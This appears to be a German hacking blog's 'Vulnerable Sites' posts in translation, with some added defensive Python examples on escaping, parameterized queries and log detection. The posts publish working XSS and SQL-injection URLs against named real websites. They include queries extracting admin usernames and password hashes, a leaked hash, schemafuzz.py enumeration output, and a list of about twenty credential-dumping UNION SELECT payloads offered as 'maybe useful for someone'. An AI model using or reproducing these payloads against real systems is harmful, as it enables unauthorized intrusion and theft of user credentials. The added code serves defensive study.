Apr 10 2010

[XSS] www.gelbeseiten.de

posted by J0hn.X3r Vulnerable Sites

After 2 years I thought I'd drop by www.gelbeseiten.de again to see whether they had fixed the XSS hole I found back then (http://www.xssed.com/mirror/53711/). And indeed, something has changed.. back then, this:

http://www.gelbeseiten.de/yp/search.yp?distance=0&subject=<script>alert(1337)</script>

no longer works.. but today:

http://www.gelbeseiten.de/yp/search.yp?distance=0&subject="></script><script>alert(1337)</script>

Since bursali always posts screenshots as proof as well, I'll do that this time too.. The screenshot is from "Southpark":
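Added example, not code from the post or from gelbeseiten.de: one reading of the two payloads is that the first fix escaped the parameter for the HTML body, but the value is also reflected inside an inline script, where `"></script>` terminates the block. The template and function names below are hypothetical; the point is that each reflection context needs its own encoder, and that json.dumps() alone still leaves `</script>` intact.

```python
import html
import json

# The two payloads quoted in the post above, embedded here as constructed test input.
PAYLOAD_OLD = '<script>alert(1337)</script>'
PAYLOAD_NEW = '"></script><script>alert(1337)</script>'

# Characters that must never appear raw inside a <script> string literal.
# json.dumps() leaves them untouched, so "</script>" inside a JSON string still
# terminates the script block; rewriting them as \uXXXX keeps them inert.
_JS_SAFE = str.maketrans({"<": "\\u003c", ">": "\\u003e", "&": "\\u0026",
                          "\u2028": "\\u2028", "\u2029": "\\u2029"})


def js_string_literal(value: str) -> str:
    """Encode value as a JavaScript string literal that is safe inside an
    inline <script> block: JSON encoding plus \\uXXXX for HTML-significant characters."""
    return json.dumps(value).translate(_JS_SAFE)


def render_search_page(subject: str) -> str:
    """Render a minimal search page (hypothetical, not gelbeseiten's real template)
    that reflects the 'subject' parameter in three contexts: an attribute value,
    HTML text, and a string inside an inline script."""
    return (
        '<input name="subject" value="{attr}">\n'
        '<p>Results for {body}</p>\n'
        '<script>var subject = {js};</script>\n'
    ).format(
        attr=html.escape(subject, quote=True),   # attribute context: " < > & escaped
        body=html.escape(subject, quote=False),  # text context: < > & are enough
        js=js_string_literal(subject),           # script context: JSON + \u escapes
    )


def breaks_out(page: str) -> bool:
    """True if an injected <script> open or close tag survived in the output.
    The template itself contains exactly one '<script>' and one '</script>'."""
    lowered = page.lower()
    return lowered.count("<script") != 1 or lowered.count("</script") != 1


if __name__ == "__main__":
    for payload in (PAYLOAD_OLD, PAYLOAD_NEW):
        page = render_search_page(payload)
        print(page)
        print("script tag injected:", breaks_out(page))
```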

Nov 30 2009

XSS & SQL-Injection @ Server-Crew.com

posted by J0hn.X3r Vulnerable Sites

Today, after a long time, I did an SQL injection again; I came across it via KoC's 1337 XSSed profile.

It's about the site Server-Crew.com – first an XSS hole:

http://server-crew.com/server-crew/index.php?show=<script>alert(1337)</script>

Then I thought "where there's an XSS, another vuln won't be far away :P", so I searched a few seconds longer and came across something:

http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/version()-- f

Output:

5.0.32-Debian_7etch11

Nice. 🙂

I had a few things output.. and quickly noticed that there are quite a few DBs there. So I used a script (I know, lame etc. But since I found the SQL injection myself, the script was just meant to take a bit of the work off my hands ;))

Here are the databases:

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                 v4.0  |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|
 
[+] URL:http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: gcp
	User: [email protected]
	Version: 5.0.32-Debian_7etch11
[+] Showing all databases current user has access too!
[+] Number of Databases: 106
 

Who normally uses "User: [email protected]"? Isn't that a security risk? Instead of creating a dedicated user for the page, doing everything via root?!

Dumb.

Here are the tables & columns of the gcp DB:

|---------------------------------------------------------------|
| rsauron[@]gmail[dot]com                                 v4.0  |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|---------------------------------------------------------------|
 
[+] URL:http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/darkc0de
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
	Database: gcp
	User: [email protected]
	Version: 5.0.32-Debian_7etch11
[+] Showing Tables & Columns from database "gcp"
[+] Number of Tables: 91
 

If we now adapt our SQL injection:

http://server-crew.com/server-crew/index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/concat_ws(0x3a,username,user_password)/**/FROM/**/gcp.host_users/**/LIMIT/**/0,1-- f

Then our output is:

admin:97b6e1f38fe6c69d0057860f5e0e2105

At first glance it looks like an MD5 PW. Pwned?! Pwned! 😀

Well, I won't do anything more there anyway, have fun 😉
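Added example, not code from the post or from Server-Crew.com: the pattern behind the produkt parameter, a numeric id concatenated into the query, next to the parameterized version that rejects the same input. The table layout, sample rows and hash value are constructed for this demo, and the payload is adapted to SQLite (no concat_ws(), so '||' is used).

```python
import sqlite3

# Payload shape from the post above, adapted to SQLite for this constructed demo.
PAYLOAD = ("-13/**/UNION/**/SELECT/**/username||':'||user_password"
           "/**/FROM/**/host_users/**/LIMIT/**/0,1-- f")


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the product page's database
    (table and column names follow the post; the rows are made up)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE host_produkte (produkt_id INTEGER PRIMARY KEY, produkt_name TEXT);
        CREATE TABLE host_users (user_id INTEGER PRIMARY KEY, username TEXT, user_password TEXT);
        INSERT INTO host_produkte VALUES (13, 'Teamspeak 20 slots');
        INSERT INTO host_users VALUES (1, 'admin', 'constructed-hash-not-real');
    """)
    return conn


def product_name_vulnerable(conn: sqlite3.Connection, produkt: str):
    """The anti-pattern: the raw parameter is concatenated into the statement.
    Because the id is never validated, a UNION appended to it is executed."""
    sql = "SELECT produkt_name FROM host_produkte WHERE produkt_id = " + produkt
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def product_name_fixed(conn: sqlite3.Connection, produkt: str):
    """Hardened version: enforce the expected type, then bind it as a parameter
    so the value can never be parsed as SQL."""
    try:
        produkt_id = int(produkt)  # anything that is not an integer id is rejected
    except ValueError:
        return None
    row = conn.execute(
        "SELECT produkt_name FROM host_produkte WHERE produkt_id = ?", (produkt_id,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", product_name_vulnerable(db, PAYLOAD))  # leaks the users row
    print("fixed:     ", product_name_fixed(db, PAYLOAD))       # None
    print("fixed, 13: ", product_name_fixed(db, "13"))          # Teamspeak 20 slots
```

Binding the parameter closes the injection; the separate finding that the application connects as root is addressed by giving it a dedicated account limited to its own schema, which no query-level fix replaces.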

Nov 11 2009

A few XSS holes…

posted by J0hn.X3r Vulnerable Sites

… found by sarex 😉

I'm sure that on some of these sites more than just XSS is possible 😉
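Added example, not from the post: detection logic for the two payload shapes that recur on this page, `<SCRIPT>alert(document.cookie)` reflections and comment-obfuscated or plus-encoded `UNION SELECT` queries, run over constructed access-log lines with placeholder addresses. It URL-decodes before matching and scores several signals, so a benign search term such as "Union Select Bakery" is not flagged.

```python
import re
from urllib.parse import unquote_plus

# Constructed combined-format access-log lines; addresses and paths are placeholders,
# the payload shapes mirror the URLs quoted on this page.
LOG_LINES = [
    '203.0.113.5 - - [11/Nov/2009:10:00:01 +0100] "GET /article.php?id=87 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [11/Nov/2009:10:00:02 +0100] "GET /article.php?id=87%3E%3CSCRIPT%3Ealert(document.cookie);%3C/SCRIPT%3E HTTP/1.1" 200 5300',
    '198.51.100.7 - - [30/Nov/2009:21:15:40 +0100] "GET /index.php?show=Teamspeak&produkt=-13/**/UNION/**/SELECT/**/version()--%20f HTTP/1.1" 200 880',
    '198.51.100.7 - - [30/Nov/2009:21:16:02 +0100] "GET /news.php?id=-91+union+select+1,2,3,concat_ws(0x3a,username,password)+from+forums_auth-- HTTP/1.1" 200 910',
    '192.0.2.9 - - [30/Nov/2009:21:20:00 +0100] "GET /search.yp?distance=0&subject=Union+Select+Bakery HTTP/1.1" 200 4000',
]

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Weighted indicators; "union select" alone (as in a product search) is not enough.
SQLI_SIGNALS = [
    (re.compile(r'union(?:\s|/\*.*?\*/)+(?:all(?:\s|/\*.*?\*/)+)?select', re.I), 2),  # space or /**/ separated
    (re.compile(r'--|/\*'), 1),                                                      # SQL comment / terminator
    (re.compile(r'\b(?:version|concat_ws|concat|unhex|hex|substring|ascii)\s*\(', re.I), 1),
    (re.compile(r'0x[0-9a-f]{2,}', re.I), 1),                                        # hex literal such as 0x3a
]
SQLI_THRESHOLD = 3

XSS_SIGNALS = [
    (re.compile(r'<\s*/?\s*script\b', re.I), 2),
    (re.compile(r'document\.cookie|alert\s*\(', re.I), 1),
]
XSS_THRESHOLD = 2


def normalise(query: str) -> str:
    """Decode the query string twice so '+', %XX and double-encoded payloads are
    compared in the form the application would actually see."""
    return unquote_plus(unquote_plus(query))


def classify(line: str):
    """Parse one log line; return ip, path and the tags that fired, or None when
    the line is not in combined log format."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    path, _, query = m.group('target').partition('?')
    q = normalise(query)
    sqli = sum(weight for rx, weight in SQLI_SIGNALS if rx.search(q))
    xss = sum(weight for rx, weight in XSS_SIGNALS if rx.search(q))
    tags = []
    if sqli >= SQLI_THRESHOLD:
        tags.append('sqli')
    if xss >= XSS_THRESHOLD:
        tags.append('xss')
    return {'ip': m.group('ip'), 'path': path, 'tags': tags}


def scan(lines):
    """Return only the parsed requests that carry at least one tag."""
    hits = []
    for line in lines:
        result = classify(line)
        if result and result['tags']:
            hits.append(result)
    return hits


if __name__ == '__main__':
    for hit in scan(LOG_LINES):
        print(hit)
```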

Oct 22 2009

XSS @ MedienTeam66

posted by J0hn.X3r Vulnerable Sites

Just found by chance when I wanted to unsubscribe from a newsletter:

http://www.mt66.de/mt66/campaign/2009_09_22_frz_mp3/div/common/unsubscribe.jsp?email=$XSS
 
http://www.mt66.de/mt66/campaign/2009_09_22_frz_mp3/div/common/unsubscribe.jsp?email=<script>alert("XSS")</script>

Maybe useful for someone..

Jan 13 2009

A few SQL injections

posted by J0hn.X3r Vulnerable Sites

Hi,

since there were holidays in August/September 2008 and I had enough time then to do and practise a few SQL injections, here is a small list. As the SQL injections are, as said, from August/September 2008, I don't know exactly whether most of them have already been fixed 🙂

http://www.gameradio.de/kommentar.php?news_id=-90/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7,8,9,10/*
http://www.jugendbibliothek-gera.7to.de/pgb/kommentar.php?id=-21/**/UNION/**/SELECT/**/1,2,3,4,version(),unhex(hex(concat(name,0x3a,passwort))),7,8,9,10,11,12,13,14,15/**/FROM/**/yuri_user/*
http://gaestebuch.ruebenlauf.de/kommentar.php?id=-117/**/UNION/**/SELECT/**/1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15/*
http://www.infoportal24.org/kommentar.php?id=-4397%27/**/UNION/**/SELECT/**/1,2,version(),4,5,6,7/*
http://www.fg-schwingenheuer.de/blog/kommentar.php?id=-125/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,version(),12,13,concat_ws(0x3a,benutzer,passwort),15,16,17,18,19,20/**/FROM/**/usr_web148_2.login/*
http://www.subba-cultcha.com/article_feature.php?id=-5420/**/UNION/**/SELECT/**/1,concat(email,0x3a,password),version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/**/FROM/**/users/*
http://gw.buffed.de/daten/bosse/index.php?kapitel=-1+UNION+SELECT+1,2,3,concat_ws(0x3a,username,password,email,icq,salt),5+FROM+user+LIMIT+0,1
http://www.ka-nightlife.de/locations.php?id=-5/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,username,password),6,7,8,9,10,11,12,13,14,15,16,version(),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57/**/from/**/bb1_users/**/limit/**/0,1&sid=
http://trekstor.de/de/products/detail_mp3.php?pid=-88/**/UNION/**/SELECT/**/1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/*
http://www.freebooknotes.com/book.php3?id=-32/**/UNION/**/SELECT/**/1,2,3,version()--
http://www.heavymetal.dk/links_bands_view.php?id=-286)/**/UNION/**/SELECT/**/1,2,version(),concat_ws(0x3a,username,password,email),5,6,7,8,9,10,11,12/**/FROM/**/users--
http://www.gamingguide.de/forum/index.php?page=XboxRanking&sortField=10%20and%20if(substring((select%20table_name%20from%20information_schema.tables%20limit%200,1),1,1)=0x43,NULL,(select%201%20union%20select%202))&sortOrder=ASC
http://www.keindsl.de/kommentar.php?id=-806/**/UNION/**/SELECT/**/1,2,3,4,version(),concat_ws(0x3a,UserName,UserPass),7,8,9,10,11,12,13/**/FROM/**/keindsl_de_2.test_scout_users/*
http://www.keindsl.de/kommentar.php?id=-806/**/UNION/**/SELECT/**/1,2,3,4,5,concat_ws(0x3a,username,user_password,user_email),7,8,9,10,11,12,13/**/FROM/**/keindsl_de_2.forum_users/**/LIMIT/**/1,1/*
http://boutiqueportal.com/index.php?main_page=customer_testimonials&testimonial_id=-1/**/UNION/**/SELECT/**/1,2,concat_ws(0x3a,admin_name,admin_pass,admin_email),version(),5,6,7,8/**/FROM/**/zen_admin/*
http://www.sbcommunicationsgroup.com/media-info.php?id=-1/**/UNION/**/SELECT/**/1,2,3,version()/*
http://choices.de/kritik.php?id=122563/**/UNION/**/SELECT/**/1,unhex(hex(version())),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*
http://www.larsie.de/include.php?path=vote/archiv.php&vid=5%27)/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user_name,user_pw),3,4,5,6,7,8,9,10,11/**/FROM/**/sun25_usr_web201_3.phpkit_1_user+--+
------------
December 2008:
 